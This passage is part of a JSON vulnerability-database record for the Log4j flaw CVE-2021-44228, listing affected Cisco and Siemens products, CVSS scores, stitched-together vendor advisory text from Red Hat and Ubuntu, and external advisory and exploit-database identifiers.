"trust": 1.0,
"vendor": "cisco",
"version": "2.3.2.0"
},
{
"model": "sd-wan vmanage",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "20.3"
},
{
"model": "ucs central software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0\\(1f\\)"
},
{
"model": "intersight virtual appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.9-343"
},
{
"model": "teamcenter",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "*"
},
{
"model": "captial",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "2019.1"
},
{
"model": "desigo cc advanced reports",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "5.1"
},
{
"model": "dna spaces\\: connector",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2.5"
},
{
"model": "connected analytics for network deployment",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "006.004.000.003"
},
{
"model": "video surveillance operations manager",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "7.14.4"
},
{
"model": "enterprise chat and email",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.0\\(1\\)"
},
{
"model": "emergency responder",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5"
},
{
"model": "firepower threat defense",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0.0"
},
{
"model": "ontap tools",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "sd-wan vmanage",
"scope": "gte",
"trust": 1.0,
"vendor": "cisco",
"version": "20.6"
},
{
"model": "dna center",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2.1.2.8"
},
{
"model": "fxos",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "6.7.0"
},
{
"model": "sd-wan vmanage",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "20.8"
},
{
"model": "mindsphere",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2021-12-11"
},
{
"model": "cloudcenter",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "4.10.0.16"
},
{
"model": "unified communications manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1\\)"
},
{
"model": "cloudcenter suite",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "5.5\\(1\\)"
},
{
"model": "identity services engine",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2.4.0"
},
{
"model": "unified contact center management portal",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.6\\(1\\)"
},
{
"model": "crosswork network automation",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.1.1"
},
{
"model": "unified communications manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1.17900.52\\)"
},
{
"model": "spectrum power 4",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "4.70"
},
{
"model": "unified communications manager im and presence service",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1\\)"
},
{
"model": "crosswork network controller",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.0.0"
},
{
"model": "common services platform collector",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "002.010\\(000.000\\)"
},
{
"model": "video surveillance manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.14\\(2.26\\)"
},
{
"model": "network services orchestrator",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "broadworks",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2021.11_1.162"
},
{
"model": "smart phy",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2.1"
},
{
"model": "cyber vision",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.0.2"
},
{
"model": "connected analytics for network deployment",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "007.002.000"
},
{
"model": "paging server",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.5\\(2\\)"
},
{
"model": "iot operations dashboard",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "nexus dashboard",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2.1.2"
},
{
"model": "siguard dsa",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "4.3"
},
{
"model": "ucs central software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0\\(1k\\)"
},
{
"model": "common services platform collector",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2.10.0.1"
},
{
"model": "fxos",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.1.0"
},
{
"model": "paging server",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "9.1\\(1\\)"
},
{
"model": "network dashboard fabric controller",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(3\\)"
},
{
"model": "cloud connect",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "12.6\\(1\\)"
},
{
"model": "desigo cc advanced reports",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "4.1"
},
{
"model": "common services platform collector",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "002.009\\(001.000\\)"
},
{
"model": "xcode",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "13.3"
},
{
"model": "data center network manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.3\\(1\\)"
},
{
"model": "dna center",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2.2.2.8"
},
{
"model": "enterprise chat and email",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.6\\(1\\)"
},
{
"model": "connected analytics for network deployment",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "007.003.000"
},
{
"model": "workload optimization manager",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2.1"
},
{
"model": "siveillance command",
"scope": "lte",
"trust": 1.0,
"vendor": "siemens",
"version": "4.16.2.1"
},
{
"model": "unified computing system",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "006.008\\(001.000\\)"
},
{
"model": "fxos",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "6.2.3"
},
{
"model": "sipass integrated",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "2.80"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-44228"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "165295"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "165287"
},
{
"db": "PACKETSTORM",
"id": "165288"
},
{
"db": "PACKETSTORM",
"id": "165289"
},
{
"db": "PACKETSTORM",
"id": "165297"
},
{
"db": "PACKETSTORM",
"id": "165298"
},
{
"db": "PACKETSTORM",
"id": "165329"
},
{
"db": "PACKETSTORM",
"id": "165632"
}
],
"trust": 0.9
},
"cve": "CVE-2021-44228",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2021-44228",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-407408",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2021-44228",
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-44228",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-202112-799",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-407408",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-44228",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-407408"
},
{
"db": "VULMON",
"id": "CVE-2021-44228"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-799"
},
{
"db": "NVD",
"id": "CVE-2021-44228"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1971 - Applying cluster state is causing elasticsearch to hit an issue and become unusable\n\n6. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Critical: Red Hat AMQ Streams 1.6.5 release and security update\nAdvisory ID: RHSA-2021:5133-01\nProduct: Red Hat JBoss AMQ\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:5133\nIssue date: 2021-12-14\nCVE Names: CVE-2021-44228\n====================================================================\n1. Summary:\n\nRed Hat AMQ Streams 1.6.5 is now available from the Red Hat Customer\nPortal. \n\nRed Hat Product Security has rated this update as having a security impact\nof Critical. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat AMQ Streams, based on the Apache Kafka project, offers a\ndistributed backbone that allows microservices and other applications to\nshare data with extremely high throughput and extremely low latency. \n\nThis release of Red Hat AMQ Streams 1.6.5 serves as a replacement for Red\nHat AMQ Streams 1.6.4, and includes security and bug fixes, and\nenhancements. For further information, refer to the release notes linked to\nin the References section. \n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an\nattacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\n3. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-44228\nhttps://access.redhat.com/security/updates/classification/#critical\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=jboss.amq.streams\u0026version=1.6.5\nhttps://access.redhat.com/security/vulnerabilities/RHSB-2021-009\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYblJBNzjgjWX9erEAQgrQQ//cpcYDzrhPXM4+U+DMgmqnuVhobliJIZt\ndwIgEyX3jYfLfXZgzkDCnHdwUjJsVub12ielI3JkHsOnGU8faFmp1kEKBvub0Xdh\nEhjmyDGVSTvdcQyCn9+1z8BDddxLM8UjUBrqF6FrLe6OJcrZi5ICOlZB9sBJ9TKj\ns4HH3NWW/PSUM96X20TZXl2ah9rkWy+MBoa+jxhOX5Fzyil2Dhcv2LNPA8SfVIme\nhqN+pSCiQ4Ik1FKJ2wPUItPtTGdQQKVIVhh/RHvGQrIqNWFXWCQkyq4R2Ho2+Eip\nb5+XW/X0Mt5AkJo5Lz8TZEIjPSeILOy6ucf3fOVDSDUIA2wtdmBA/QV8XvNPtRzy\nzIUMMdKmuKfR6IF2N+05G6sJ0BWisMmz8hYVD/nBh4FF9HmUGP8wBaLrBMDpGhPE\nQu59Ysh0/cdtCGY0O75QSa6RbDn6WyE56groY0i0JSSzrlA94ygSuNJ71nG5wz5I\n9TdZqceCDDmR9/FsFgvtzNRaJXqq92/fJdHwTJ/qToutYRsBgEYPmCpNqMXBz59W\noXs+VKtt2muYCe9WNDRO/1l9WAs6SO8FekvxcEripg8s1gofkvB4Xa7VkSkbrROZ\nqCyI4Rz1JSYX287LsQ+Z5E7f4ZchsAIggxOw6ovrnuXbT+rS4IVpwu6Os2AOYQHo\n9Sch0c3lbGw=Ervs\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nRed Hat JBoss Enterprise Application Platform 7 is a platform for Java\napplications based on the WildFly application runtime. =========================================================================\nUbuntu Security Notice USN-5192-2\nDecember 17, 2021\n\napache-log4j2 vulnerability\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 ESM\n\nSummary:\n\nApache Log4j 2 could be made to crash or run programs as an administrator\nif it received a specially crafted input. This update provides\nthe corresponding update for Ubuntu 16.04 ESM. \n\nOriginal advisory details:\n\n Chen Zhaojun discovered that Apache Log4j 2 allows remote attackers to run\n programs via a special crafted input. An attacker could use this vulnerability\n to cause a denial of service or possibly execute arbitrary code. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 ESM:\n liblog4j2-java 2.4-2ubuntu0.1~esm1\n\nIn general, a standard system update will make all the necessary changes. The purpose of this\ntext-only errata is to inform you about the security issues fixed in this\nrelease. \n\nInstallation instructions are available from the Fuse product documentation\npages:\n\nFuse 7.8:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.9:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.10:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\n4. \n\nVMware Unified Access Gateway\nVMware Carbon Black Workload Appliance\nVMware Site Recovery Manager, vSphere Replication\nVMware Tanzu GemFire\nVMware Tanzu GemFire for VMs\nVMware Tanzu Operations Manager\nVMware Tanzu Application Service for VMs\nVMware Horizon Agents Installer\n\nYou are receiving this alert because you are subscribed to the VMware Security Announcements mailing list. To modify your subscription or unsubscribe please visit https://lists.vmware.com/mailman/listinfo/security-announce",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-44228"
},
{
"db": "VULHUB",
"id": "VHN-407408"
},
{
"db": "VULMON",
"id": "CVE-2021-44228"
},
{
"db": "PACKETSTORM",
"id": "165295"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "165287"
},
{
"db": "PACKETSTORM",
"id": "165288"
},
{
"db": "PACKETSTORM",
"id": "165289"
},
{
"db": "PACKETSTORM",
"id": "165297"
},
{
"db": "PACKETSTORM",
"id": "165298"
},
{
"db": "PACKETSTORM",
"id": "165324"
},
{
"db": "PACKETSTORM",
"id": "165329"
},
{
"db": "PACKETSTORM",
"id": "165348"
},
{
"db": "PACKETSTORM",
"id": "165632"
},
{
"db": "PACKETSTORM",
"id": "165371"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-407408",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-407408"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-44228",
"trust": 3.0
},
{
"db": "PACKETSTORM",
"id": "165371",
"trust": 1.8
},
{
"db": "PACKETSTORM",
"id": "165311",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "165225",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "165532",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "165281",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "165306",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "165260",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "165673",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "165282",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "167794",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "167917",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "165270",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "165261",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "165642",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "165307",
"trust": 1.7
},
{
"db": "SIEMENS",
"id": "SSA-479842",
"trust": 1.7
},
{
"db": "SIEMENS",
"id": "SSA-714170",
"trust": 1.7
},
{
"db": "SIEMENS",
"id": "SSA-661247",
"trust": 1.7
},
{
"db": "SIEMENS",
"id": "SSA-397453",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/12/13/1",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/12/14/4",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/12/10/3",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/12/13/2",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/12/10/2",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/12/15/3",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/12/10/1",
"trust": 1.7
},
{
"db": "CERT/CC",
"id": "VU#930724",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "171626",
"trust": 1.6
},
{
"db": "PACKETSTORM",
"id": "165324",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "165348",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "165733",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166313",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165279",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "50592",
"trust": 0.7
},
{
"db": "CS-HELP",
"id": "SB2022060708",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022012045",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022010629",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022072076",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022021428",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022071316",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022062001",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021122212",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022010908",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021122403",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021121720",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021123016",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022010421",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031501",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021122907",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022012732",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021121652",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021121492",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022010522",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021121201",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021121535",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021122721",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021122018",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022032006",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060808",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022011732",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021122401",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021121350",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022030923",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021122811",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022020607",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022012439",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022011042",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022021807",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022010322",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021122122",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0090",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0492",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4211",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4187.6",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0237",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4236",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0332",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0080",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4186.4",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4269",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4198",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4316",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4274",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0247",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1188",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4302.3",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4256.2",
"trust": 0.6
},
{
"db": "CXSECURITY",
"id": "WLB-2022120027",
"trust": 0.6
},
{
"db": "CXSECURITY",
"id": "WLB-2021120069",
"trust": 0.6
},
{
"db": "CXSECURITY",
"id": "WLB-2022080025",
"trust": 0.6
},
{
"db": "CXSECURITY",
"id": "WLB-2022010065",
"trust": 0.6
},
{
"db": "LENOVO",
"id": "LEN-76573",
"trust": 0.6
},
{
"db": "ICS CERT",
"id": "ICSA-21-357-02",
"trust": 0.6
},
{
"db": "ICS CERT",
"id": "ICSA-22-034-01",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "51183",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202112-799",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "165329",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165295",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165297",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165298",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165289",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165632",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165293",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165343",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165333",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165520",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165285",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165290",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165291",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165326",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165264",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "50590",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-407408",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-44228",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165286",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165287",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165288",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-407408"
},
{
"db": "VULMON",
"id": "CVE-2021-44228"
},
{
"db": "PACKETSTORM",
"id": "165295"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "165287"
},
{
"db": "PACKETSTORM",
"id": "165288"
},
{
"db": "PACKETSTORM",
"id": "165289"
},
{
"db": "PACKETSTORM",
"id": "165297"
},
{
"db": "PACKETSTORM",
"id": "165298"
},
{
"db": "PACKETSTORM",
"id": "165324"
},
{
"db": "PACKETSTORM",
"id": "165329"
},
{
"db": "PACKETSTORM",
"id": "165348"
},
{
"db": "PACKETSTORM",
"id": "165632"
},
{
"db": "PACKETSTORM",
"id": "165371"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-799"
},
{
"db": "NVD",
"id": "CVE-2021-44228"
}
]
},
"id": "VAR-202112-0566",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-407408"
}
],
"trust": 0.7188405714285715
},
"last_update_date": "2024-11-29T19:32:10.142000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Apache Log4j Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=174249"
},
{
"title": "Debian CVElist Bug Report Logs: apache-log4j2: CVE-2021-44228: Remote code injection via crafted log messages",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=4eae9b09b97da57f4ca6103cc85ed4da"
},
